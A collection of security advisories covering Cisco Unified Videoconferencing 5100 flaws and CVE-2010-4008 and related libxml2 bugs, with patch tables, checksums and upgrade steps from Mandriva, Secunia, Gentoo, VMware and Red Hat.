regarding vulnerabilities in the Cisco Unified Videoconferencing
(Cisco UVC) 5100 series products.
The original report is available at the following links:
http://seclists.org/fulldisclosure/2010/Nov/167
http://www.trustmatta.com/advisories/MATTA-2010-001.txt
Cisco would like to thank Florent Daigniere of Matta Consulting for
reporting these vulnerabilities to us. Cisco greatly appreciate the
opportunity to work with researchers on security vulnerabilities and
welcome the opportunity to review and assist in product reports.
All versions of system software prior to the first fixed, which is
indicated in the Software Version and Fixes Table, are affected.
To view the version of system software that is currently running on
Cisco Unified Videoconferencing 5100 Series Products, access the
Cisco UVC device via the web GUI interface. On the status screen, the
"Software Version" field below the "Product Information" section
indicates the current system software.
Details for Reported Vulnerabilities
====================================
Hard-Coded Credentials in Cisco UVC Products
+-------------------------------------------
The Linux shell contains three hard-coded usernames and passwords.
The passwords cannot be changed, and the accounts cannot be deleted.
Remote Command Injection on the Web Interface in Cisco UVC Products
+------------------------------------------------------------------
Several fields in the web server interface of Cisco UVC products are
vulnerable to a shell command injection vulnerability. An
administrator user who is authenticated to the web interface of Cisco
UVC products could exploit this vulnerability to execute root-level
commands on the Linux operating system. Exploitation of this
vulnerability could result in a complete compromise of the device. It may also affect VxWorks-based Cisco UVC products.
Weak Obfuscation of Credentials in Cisco UVC Products
+----------------------------------------------------
An attacker who can obtain access to the Linux operating system could
retrieve a file that is used to store the administrator and operator
accounts of the Cisco UVC web GUI. The passwords in this file are
obfuscated using an easily reversible hashing scheme. Exploit code
that assists in recovering the passwords exists.
FTP Server Accessible by Default in Cisco UVC Products
+-----------------------------------------------------
The FTP server is enabled by default on Cisco UVC systems. An
attacker can leverage the FTP server to exploit other vulnerabilities
in this Cisco Security Response. Authentication is required to log
into the device via the FTP server.
FTP access to the device can be controlled via the "Security mode"
field of the Cisco UVC products web GUI. If the Security setting is
configured as "High" or "Maximum," the device will not accept FTP
connections. For further information, consult the Configuration Guide
for Cisco Unified Videoconferencing 5000 MCU Release 7.0 at the
following link:
http://www.cisco.com/en/US/docs/video/cuvc/7_0/configuration_guide/setup.html#wp1690479
This service misconfiguration affects both Linux-based operating
system Cisco UVC products and VxWorks-based Cisco UVC products.
Shadow Password File has Read Permissions for All Users in Cisco UVC Products
+----------------------------------------------------------------------------
The shadow password file should only be readable by the root account.
Allowing read access to the shadow password file allows other users
of the system with shell access to retrieve the shadow password file.
An authenticated user who has access to the Linux operating system
directories, may be able to retrieve the shadow password file.
This service misconfiguration only affects Linux-based operating
system Cisco UVC products.
Lock Down OpenSSH Configuration in Cisco UVC Products
+----------------------------------------------------
The SSH server has a restricted shell, however the configuration of
the SSH server allows for X.11 forwarding and socks proxies to be
created.
This service misconfiguration affects only Linux-based operating
system Cisco UVC products.
Daemon That Binds the Port of the Web Interface Runs as root in Cisco
UVC Products
In the event that all attacker exploits a flaw in a script running
with root's permissions that allows them to write to files, gain
access to the system or cause a denial of service.
This service misconfiguration affects only Linux-based operating
system Cisco UVC products.
Weak Session IDs on the Web Interface in Cisco UVC Products
+----------------------------------------------------------
The Cisco UVC web interface has session IDs that are incremented
based on a time counter. Having predictable session IDs, assists in
the hijacking of user sessions.
Usage of Cookies to Store Credentials in Cisco UVC Products
+----------------------------------------------------------
On Linux-based Cisco UVC products, web interface credentials are
stored in Base64 format in the cookie that is sent to a browser. On
VxWorks-based Cisco UVC products, web interface credentials are
stored in Base64 format or in clear text.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to determine
exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
All Cisco UVC software versions prior to the first fixed software
release, which is indicated in the following table, are affected by the
associated vulnerabilities.
This software table will be updated as software fixes become available.
+---------------------------------------+
| Linux Cisco UVC Operating System |
| Versions |
|---------------------------------------|
| Product: | First Fixed |
| | Release |
|-------------------+-------------------|
| | Currently no |
| Cisco Unified | fixed code |
| Videoconferencing | available. |
| 5110 and 5115 | Contact your |
| Systems | support |
| | organization. |
|---------------------------------------|
| VxWorks Cisco UVC Operating System |
| Versions |
|---------------------------------------|
| Product: | First Fixed |
| | Release |
|-------------------+-------------------|
| | Currently no |
| Cisco Unified | fixed code |
| Videoconferencing | available. |
| 5230 System: | Contact your |
| | support |
| | organization. |
| 3545 System: | Contact your |
| | support |
| | organization. |
| 3515 MCU: | Contact your |
| | support |
| | organization. |
| 3522 BRI Gateway: | Contact your |
| | support |
| | organization. |
| 3527 PRI Gateway: | Contact your |
| | support |
| | organization. |
+---------------------------------------+
Workarounds
===========
There are no workarounds for the vulnerabilities that are described in
this Cisco Security Response.
Administrators can mitigate these vulnerabilities by limiting access to
Cisco UVC web server to trusted hosts by disabling FTP, SSH, and Telnet
services and by setting the "Security mode" field in the "Security"
section of the Cisco UVC web GUI to "Maximum." For further information,
consult the Configuration Guide for Cisco Unified Videoconferencing 5000
MCU Release 7.0 at the following link:
http://www.cisco.com/en/US/docs/video/cuvc/7_0/configuration_guide/setup.html#wp1690479
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY
ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
Status of this Notice: INTERIM
==============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY
ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE.YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.CISCO EXPECTS TO UPDATE THIS DOCUMENT AS NEW
INFORMATION BECOMES AVAILABLE.
A stand-alone copy or Paraphrase of the text of this document that omits
the distribution URL in the following section is an uncontrolled copy,
and may lack important information or contain factual errors.
Revision History
================
+------------------------------------------------------------+
| Revision 1.0 | 2010-November-17 | Initial public release. |
+------------------------------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in
Cisco products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding Cisco security
notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)
iF4EAREIAAYFAkzj6GAACgkQQXnnBKKRMNBMtwEAhEp+BKb+iRvXhPCBw/SGJSjx
mM5ljSrDefGSCtlhkawA/Ap85VdNrVcb3lVWb5rtXoqGbrqDnDozK6DGKejmQd8M
=f751
-----END PGP SIGNATURE-----
| VAR-201011-0019 | CVE-2010-4008 | libxml2 of XPath Service disruption in expression (DoS) Vulnerabilities |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
libxml2 before 2.7.8, as used in Google Chrome before 7.0.517.44, Apple Safari 5.0.2 and earlier, and other products, reads from invalid memory locations during processing of malformed XPath expressions, which allows context-dependent attackers to cause a denial of service (application crash) via a crafted XML document. Google Chrome is an open source web browser released by Google.
Packages for 2009.0 are provided as of the Extended Maintenance
Program.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4008
_______________________________________________________________________
Updated Packages:
Mandriva Linux 2009.0:
cae85730aaa16e754195e18b2b128d48 2009.0/i586/libxml2_2-2.7.1-1.5mdv2009.0.i586.rpm
f4edef0bd2539c874a4ee18dd3235495 2009.0/i586/libxml2-devel-2.7.1-1.5mdv2009.0.i586.rpm
592bbd5ad884cb7f15626d8ec00a945c 2009.0/i586/libxml2-python-2.7.1-1.5mdv2009.0.i586.rpm
abfc530fe15542acf77e3abee46c5348 2009.0/i586/libxml2-utils-2.7.1-1.5mdv2009.0.i586.rpm
51bdedc951b8bbb6bbc3748c6a4b5f1f 2009.0/SRPMS/libxml2-2.7.1-1.5mdv2009.0.src.rpm
Mandriva Linux 2009.0/X86_64:
aab2482cab13939e3d0ce93cfdd2d1b2 2009.0/x86_64/lib64xml2_2-2.7.1-1.5mdv2009.0.x86_64.rpm
bac2084ecea5fd9459bd90f34f853045 2009.0/x86_64/lib64xml2-devel-2.7.1-1.5mdv2009.0.x86_64.rpm
418b6a3177323b782d9bb191f2d491e1 2009.0/x86_64/libxml2-python-2.7.1-1.5mdv2009.0.x86_64.rpm
69fd3a07ad8ac5a5eb44e2d1414104db 2009.0/x86_64/libxml2-utils-2.7.1-1.5mdv2009.0.x86_64.rpm
51bdedc951b8bbb6bbc3748c6a4b5f1f 2009.0/SRPMS/libxml2-2.7.1-1.5mdv2009.0.src.rpm
Mandriva Linux 2010.0:
fb5c9604e47d24e09ad712a649fcc35c 2010.0/i586/libxml2_2-2.7.6-1.1mdv2010.0.i586.rpm
6403c9bdaed960dbb3bcbe68666a52b7 2010.0/i586/libxml2-devel-2.7.6-1.1mdv2010.0.i586.rpm
586212f51e0791a0f2a38c7be5d9716a 2010.0/i586/libxml2-python-2.7.6-1.1mdv2010.0.i586.rpm
3be0dee356f402a507ad6b5d7a325a6d 2010.0/i586/libxml2-utils-2.7.6-1.1mdv2010.0.i586.rpm
145009255e759becf090ccbb7a222776 2010.0/SRPMS/libxml2-2.7.6-1.1mdv2010.0.src.rpm
Mandriva Linux 2010.0/X86_64:
c63c714501a5b8ca2b9b6e9d5e937ddb 2010.0/x86_64/lib64xml2_2-2.7.6-1.1mdv2010.0.x86_64.rpm
657be2ee648752464520066023bd30ea 2010.0/x86_64/lib64xml2-devel-2.7.6-1.1mdv2010.0.x86_64.rpm
9d59d8f80191f2ed759de95958b4e0db 2010.0/x86_64/libxml2-python-2.7.6-1.1mdv2010.0.x86_64.rpm
e2d0e7fdba10ad335bb9b58d0d8afb66 2010.0/x86_64/libxml2-utils-2.7.6-1.1mdv2010.0.x86_64.rpm
145009255e759becf090ccbb7a222776 2010.0/SRPMS/libxml2-2.7.6-1.1mdv2010.0.src.rpm
Mandriva Linux 2010.1:
e593d08acde951507fce73dbdf279b36 2010.1/i586/libxml2_2-2.7.7-1.1mdv2010.1.i586.rpm
53b338fe99b6824cb6edb16e3d388b51 2010.1/i586/libxml2-devel-2.7.7-1.1mdv2010.1.i586.rpm
139dacf78c8fb08030a5182784c112ec 2010.1/i586/libxml2-python-2.7.7-1.1mdv2010.1.i586.rpm
8dda64f49b49952502c50bf245ebf678 2010.1/i586/libxml2-utils-2.7.7-1.1mdv2010.1.i586.rpm
199d8b8af1f42c409b18e51731baf896 2010.1/SRPMS/libxml2-2.7.7-1.1mdv2010.1.src.rpm
Mandriva Linux 2010.1/X86_64:
75633f5ec4ef9eebdac70a9ecaab2449 2010.1/x86_64/lib64xml2_2-2.7.7-1.1mdv2010.1.x86_64.rpm
e452646c112108d11d29a4ba78fba487 2010.1/x86_64/lib64xml2-devel-2.7.7-1.1mdv2010.1.x86_64.rpm
688e113fc36a3d51ee099e0e2ecaa28a 2010.1/x86_64/libxml2-python-2.7.7-1.1mdv2010.1.x86_64.rpm
493d57c4ec894516f11b69015b31ef5a 2010.1/x86_64/libxml2-utils-2.7.7-1.1mdv2010.1.x86_64.rpm
199d8b8af1f42c409b18e51731baf896 2010.1/SRPMS/libxml2-2.7.7-1.1mdv2010.1.src.rpm
Corporate 4.0:
0c4e8b2ac2a276d280b66b6fa8551450 corporate/4.0/i586/libxml2-2.6.21-3.7.20060mlcs4.i586.rpm
53ccb20aea237421519e86d717a65369 corporate/4.0/i586/libxml2-devel-2.6.21-3.7.20060mlcs4.i586.rpm
d08ff4980c6aca39516d1e726fbb974c corporate/4.0/i586/libxml2-python-2.6.21-3.7.20060mlcs4.i586.rpm
fb30f123c27a29bd1efe793cfc257f90 corporate/4.0/i586/libxml2-utils-2.6.21-3.7.20060mlcs4.i586.rpm
46e9c8c019741553dd345a4d4487eb49 corporate/4.0/SRPMS/libxml2-2.6.21-3.7.20060mlcs4.src.rpm
Corporate 4.0/X86_64:
92bc21ac3d7d357222b563fcb324b3c3 corporate/4.0/x86_64/lib64xml2-2.6.21-3.7.20060mlcs4.x86_64.rpm
eb0624c01c1c4d3252ddeaf8163134eb corporate/4.0/x86_64/lib64xml2-devel-2.6.21-3.7.20060mlcs4.x86_64.rpm
80b58173e21e7f9e57b88082eccbefdc corporate/4.0/x86_64/lib64xml2-python-2.6.21-3.7.20060mlcs4.x86_64.rpm
5b7d80b623a1dc07e5dd319919a11fbc corporate/4.0/x86_64/libxml2-utils-2.6.21-3.7.20060mlcs4.x86_64.rpm
46e9c8c019741553dd345a4d4487eb49 corporate/4.0/SRPMS/libxml2-2.6.21-3.7.20060mlcs4.src.rpm
Mandriva Enterprise Server 5:
4bc323f7bc1dab4927a7e8c4838ccc20 mes5/i586/libxml2_2-2.7.1-1.5mdvmes5.1.i586.rpm
5a1d23b817beb1fe3f2e939b0d2909ad mes5/i586/libxml2-devel-2.7.1-1.5mdvmes5.1.i586.rpm
f53fd718b6f6e8e0e30b01aeb12b2f47 mes5/i586/libxml2-python-2.7.1-1.5mdvmes5.1.i586.rpm
717dc7dee73859eb65f68195fa4f80bc mes5/i586/libxml2-utils-2.7.1-1.5mdvmes5.1.i586.rpm
5fbf33c05587c8d4f1708737d52ffd58 mes5/SRPMS/libxml2-2.7.1-1.5mdvmes5.1.src.rpm
Mandriva Enterprise Server 5/X86_64:
06e99ea43205f25da07f39ea5fcc9233 mes5/x86_64/lib64xml2_2-2.7.1-1.5mdvmes5.1.x86_64.rpm
3ee19da3eebf29286a0543da82ba3707 mes5/x86_64/lib64xml2-devel-2.7.1-1.5mdvmes5.1.x86_64.rpm
5f1d18dc754447947dd88a1b1cd7ab1d mes5/x86_64/libxml2-python-2.7.1-1.5mdvmes5.1.x86_64.rpm
ef5f8b03f8006957af1c289aa61600e1 mes5/x86_64/libxml2-utils-2.7.1-1.5mdvmes5.1.x86_64.rpm
5fbf33c05587c8d4f1708737d52ffd58 mes5/SRPMS/libxml2-2.7.1-1.5mdvmes5.1.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iD8DBQFM87BcmqjQ0CJFipgRAhtLAKDShPCQ/Gsm7qBzvcTZaIdAyTL0wQCfc7vl
ViUDiKySUb6P7eFnOzt8Eg8=
=8Sf0
-----END PGP SIGNATURE-----
. ----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM).
Request a free trial:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
Libxml2 XPath Double Free Vulnerability
SECUNIA ADVISORY ID:
SA42721
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/42721/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=42721
RELEASE DATE:
2010-12-28
DISCUSS ADVISORY:
http://secunia.com/advisories/42721/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/42721/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=42721
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been reported in Libxml2, which can be exploited
by malicious people to cause a DoS (Denial of Service) or potentially
compromise an application using the library.
For more information see vulnerability #11:
SA42472
The vulnerability is reported in version 2.7.8.
SOLUTION:
Do not process untrusted XML content using the library.
PROVIDED AND/OR DISCOVERED BY:
Yang Dingning from NCNIPC, Graduate University of Chinese Academy of
Sciences.
ORIGINAL ADVISORY:
http://code.google.com/p/chromium/issues/detail?id=63444
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201110-26
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: High
Title: libxml2: Multiple vulnerabilities
Date: October 26, 2011
Bugs: #345555, #370715, #386985
ID: 201110-26
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities were found in libxml2 which could lead to
execution of arbitrary code or a Denial of Service.
Background
==========
libxml2 is the XML C parser and toolkit developed for the Gnome
project.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-libs/libxml2 < 2.7.8-r3 >= 2.7.8-r3
Description
===========
Multiple vulnerabilities have been discovered in libxml2. Please review
the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All libxml2 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-libs/libxml2-2.7.8-r3"
References
==========
[ 1 ] CVE-2010-4008
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4008
[ 2 ] CVE-2010-4494
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4494
[ 3 ] CVE-2011-1944
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1944
[ 4 ] CVE-2011-2821
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2821
[ 5 ] CVE-2011-2834
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2834
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201110-26.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2011 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. Relevant releases
ESX 5.0 without patch ESXi500-201207101-SG
3. Problem Description
a. ESXi update to third party component libxml2
The libxml2 third party library has been updated which addresses
multiple security issues
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2010-4008, CVE-2010-4494, CVE-2011-0216,
CVE-2011-1944, CVE-2011-2821, CVE-2011-2834, CVE-2011-3905,
CVE-2011-3919 and CVE-2012-0841 to these issues.
The following table lists what action remediates the vulnerability
(column 4) if a solution is available.
VMware Product Running Replace with/
Product Version on Apply Patch
========== ======== ======== =================
vCenter any Windows not affected
hosted * any any not affected
ESXi 5.0 any ESXi500-201207101-SG
ESXi 4.1 any patch pending
ESXi 4.0 any patch pending
ESXi 3.5 any patch pending
ESX any any not applicable
* hosted products are VMware Workstation, Player, ACE, Fusion.
Note: "patch pending" means that the product is affected,
but no patch is currently available. The advisory will be
updated when a patch is available. Solution
Please review the patch/release notes for your product and
version and verify the checksum of your downloaded file.
ESXi 5.0
--------
ESXi500-201207001
md5sum: 01196c5c1635756ff177c262cb69a848
sha1sum: 85936f5439100cd5fb55c7add574b5b3b937fe86
http://kb.vmware.com/kb/2020571
ESXi500-201207001 contains ESXi500-201207101-SG
5. Change log
2012-07-12 VMSA-2012-0012
Initial security advisory in conjunction with the release of a patch
for ESXi 5.0 on 2012-07-12. Contact
E-mail list for product security notifications and announcements:
http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce
This Security Advisory is posted to the following lists:
* security-announce at lists.vmware.com
* bugtraq at securityfocus.com
* full-disclosure at lists.grok.org.uk
E-mail: security at vmware.com
PGP key at: http://kb.vmware.com/kb/1055
VMware Security Advisories
http://www.vmware.com/security/advisories
VMware security response policy
http://www.vmware.com/support/policies/security_response.html
General support life cycle policy
http://www.vmware.com/support/policies/eos.html
VMware Infrastructure support life cycle policy
http://www.vmware.com/support/policies/eos_vi.html
Copyright 2012 VMware Inc. All rights reserved. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Important: libxml2 security update
Advisory ID: RHSA-2012:0017-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2012-0017.html
Issue date: 2012-01-11
CVE Names: CVE-2010-4008 CVE-2011-0216 CVE-2011-1944
CVE-2011-2834 CVE-2011-3905 CVE-2011-3919
=====================================================================
1. Summary:
Updated libxml2 packages that fix several security issues are now available
for Red Hat Enterprise Linux 5.
The Red Hat Security Response Team has rated this update as having
important security impact. Common Vulnerability Scoring System (CVSS) base
scores, which give detailed severity ratings, are available for each
vulnerability from the CVE links in the References section.
2. Relevant releases/architectures:
RHEL Desktop Workstation (v. 5 client) - i386, x86_64
Red Hat Enterprise Linux (v. 5 server) - i386, ia64, ppc, s390x, x86_64
Red Hat Enterprise Linux Desktop (v. 5 client) - i386, x86_64
3. Description:
The libxml2 library is a development toolbox providing the implementation
of various XML standards. One of those standards is the XML Path Language
(XPath), which is a language for addressing parts of an XML document.
A heap-based buffer overflow flaw was found in the way libxml2 decoded
entity references with long names. A remote attacker could provide a
specially-crafted XML file that, when opened in an application linked
against libxml2, would cause the application to crash or, potentially,
execute arbitrary code with the privileges of the user running the
application. (CVE-2011-3919)
An off-by-one error, leading to a heap-based buffer overflow, was found in
the way libxml2 parsed certain XML files. A remote attacker could provide a
specially-crafted XML file that, when opened in an application linked
against libxml2, would cause the application to crash or, potentially,
execute arbitrary code with the privileges of the user running the
application. (CVE-2011-0216)
An integer overflow flaw, leading to a heap-based buffer overflow, was
found in the way libxml2 parsed certain XPath expressions. (CVE-2011-1944)
Flaws were found in the way libxml2 parsed certain XPath expressions.
(CVE-2010-4008, CVE-2011-2834)
An out-of-bounds memory read flaw was found in libxml2. A remote attacker
could provide a specially-crafted XML file that, when opened in an
application linked against libxml2, would cause the application to crash.
(CVE-2011-3905)
Note: Red Hat does not ship any applications that use libxml2 in a way that
would allow the CVE-2011-1944, CVE-2010-4008, and CVE-2011-2834 flaws to be
exploited; however, third-party applications may allow XPath expressions to
be passed which could trigger these flaws.
Red Hat would like to thank the Google Security Team for reporting the
CVE-2010-4008 issue. Upstream acknowledges Bui Quang Minh from Bkis as the
original reporter of CVE-2010-4008.
All users of libxml2 are advised to upgrade to these updated packages,
which contain backported patches to correct these issues. The desktop must
be restarted (log out, then log back in) for this update to take effect.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/kb/docs/DOC-11259
5. Bugs fixed (http://bugzilla.redhat.com/):
645341 - CVE-2010-4008 libxml2: Crash (stack frame overflow or NULL pointer dereference) by traversal of XPath axis
709747 - CVE-2011-1944 libxml, libxml2: Heap-based buffer overflow by adding new namespace node to an existing nodeset or merging nodesets
724906 - CVE-2011-0216 libxml2: Off-by-one error leading to heap-based buffer overflow in encoding
735751 - CVE-2011-2834 libxml2: double-free caused by malformed XPath expression in XSLT
767387 - CVE-2011-3905 libxml2 out of bounds read
771896 - CVE-2011-3919 libxml2: Heap-based buffer overflow when decoding an entity reference with a long name
6. Package List:
Red Hat Enterprise Linux Desktop (v. 5 client):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/libxml2-2.6.26-2.1.12.el5_7.2.src.rpm
i386:
libxml2-2.6.26-2.1.12.el5_7.2.i386.rpm
libxml2-debuginfo-2.6.26-2.1.12.el5_7.2.i386.rpm
libxml2-python-2.6.26-2.1.12.el5_7.2.i386.rpm
x86_64:
libxml2-2.6.26-2.1.12.el5_7.2.i386.rpm
libxml2-2.6.26-2.1.12.el5_7.2.x86_64.rpm
libxml2-debuginfo-2.6.26-2.1.12.el5_7.2.i386.rpm
libxml2-debuginfo-2.6.26-2.1.12.el5_7.2.x86_64.rpm
libxml2-python-2.6.26-2.1.12.el5_7.2.x86_64.rpm
RHEL Desktop Workstation (v. 5 client):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/libxml2-2.6.26-2.1.12.el5_7.2.src.rpm
i386:
libxml2-debuginfo-2.6.26-2.1.12.el5_7.2.i386.rpm
libxml2-devel-2.6.26-2.1.12.el5_7.2.i386.rpm
x86_64:
libxml2-debuginfo-2.6.26-2.1.12.el5_7.2.i386.rpm
libxml2-debuginfo-2.6.26-2.1.12.el5_7.2.x86_64.rpm
libxml2-devel-2.6.26-2.1.12.el5_7.2.i386.rpm
libxml2-devel-2.6.26-2.1.12.el5_7.2.x86_64.rpm
Red Hat Enterprise Linux (v. 5 server):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/libxml2-2.6.26-2.1.12.el5_7.2.src.rpm
i386:
libxml2-2.6.26-2.1.12.el5_7.2.i386.rpm
libxml2-debuginfo-2.6.26-2.1.12.el5_7.2.i386.rpm
libxml2-devel-2.6.26-2.1.12.el5_7.2.i386.rpm
libxml2-python-2.6.26-2.1.12.el5_7.2.i386.rpm
ia64:
libxml2-2.6.26-2.1.12.el5_7.2.i386.rpm
libxml2-2.6.26-2.1.12.el5_7.2.ia64.rpm
libxml2-debuginfo-2.6.26-2.1.12.el5_7.2.i386.rpm
libxml2-debuginfo-2.6.26-2.1.12.el5_7.2.ia64.rpm
libxml2-devel-2.6.26-2.1.12.el5_7.2.ia64.rpm
libxml2-python-2.6.26-2.1.12.el5_7.2.ia64.rpm
ppc:
libxml2-2.6.26-2.1.12.el5_7.2.ppc.rpm
libxml2-2.6.26-2.1.12.el5_7.2.ppc64.rpm
libxml2-debuginfo-2.6.26-2.1.12.el5_7.2.ppc.rpm
libxml2-debuginfo-2.6.26-2.1.12.el5_7.2.ppc64.rpm
libxml2-devel-2.6.26-2.1.12.el5_7.2.ppc.rpm
libxml2-devel-2.6.26-2.1.12.el5_7.2.ppc64.rpm
libxml2-python-2.6.26-2.1.12.el5_7.2.ppc.rpm
s390x:
libxml2-2.6.26-2.1.12.el5_7.2.s390.rpm
libxml2-2.6.26-2.1.12.el5_7.2.s390x.rpm
libxml2-debuginfo-2.6.26-2.1.12.el5_7.2.s390.rpm
libxml2-debuginfo-2.6.26-2.1.12.el5_7.2.s390x.rpm
libxml2-devel-2.6.26-2.1.12.el5_7.2.s390.rpm
libxml2-devel-2.6.26-2.1.12.el5_7.2.s390x.rpm
libxml2-python-2.6.26-2.1.12.el5_7.2.s390x.rpm
x86_64:
libxml2-2.6.26-2.1.12.el5_7.2.i386.rpm
libxml2-2.6.26-2.1.12.el5_7.2.x86_64.rpm
libxml2-debuginfo-2.6.26-2.1.12.el5_7.2.i386.rpm
libxml2-debuginfo-2.6.26-2.1.12.el5_7.2.x86_64.rpm
libxml2-devel-2.6.26-2.1.12.el5_7.2.i386.rpm
libxml2-devel-2.6.26-2.1.12.el5_7.2.x86_64.rpm
libxml2-python-2.6.26-2.1.12.el5_7.2.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2010-4008.html
https://www.redhat.com/security/data/cve/CVE-2011-0216.html
https://www.redhat.com/security/data/cve/CVE-2011-1944.html
https://www.redhat.com/security/data/cve/CVE-2011-2834.html
https://www.redhat.com/security/data/cve/CVE-2011-3905.html
https://www.redhat.com/security/data/cve/CVE-2011-3919.html
https://access.redhat.com/security/updates/classification/#important
8. Contact:
